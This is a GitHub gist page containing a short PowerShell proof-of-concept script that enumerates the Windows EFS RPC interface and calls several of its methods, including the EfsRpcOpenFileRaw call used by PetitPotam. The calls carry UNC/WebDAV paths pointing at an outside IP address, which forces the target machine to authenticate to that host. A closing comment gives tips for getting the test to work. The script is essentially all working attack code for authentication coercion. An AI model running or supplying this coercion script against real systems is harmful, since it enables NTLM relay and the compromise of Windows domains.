Created
July 30, 2021 21:47
-
-
Save leechristensen/fda130890fb3c194115e7b856640c30e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install-Module NtObjectManager | |
| Import-Module NtObjectManager | |
| $Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll ` | |
| -DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | |
| $EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' } | |
| $client = Get-RpcClient -Server $EfsInterace | |
| $client.Connect() | |
| $ret = $client.EfsRpcOpenFileRaw( "\\192.168.230.200@1000/asdf\asdf\asdf",1) # <-- What PetitPotam uses | |
| $ret = $client.EfsRpcEncryptFileSrv( "\\192.168.230.200@1001/asdf\asdf\asdf") | |
| $ret = $client.EfsRpcDecryptFileSrv( "\\192.168.230.200@1002/asdf\asdf\asdf",0) | |
| $ret = $client.EfsRpcQueryUsersOnFile( "\\192.168.230.200@1003/asdf\asdf\asdf") | |
| $ret = $client.EfsRpcQueryRecoveryAgents("\\192.168.230.200@1004/asdf\asdf\asdf") | |
| $client.Disconnect() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Dont forget to turn on webclient to test this :) Also you need to either reset webclient or wait 30 seconds between subsequent hung tests.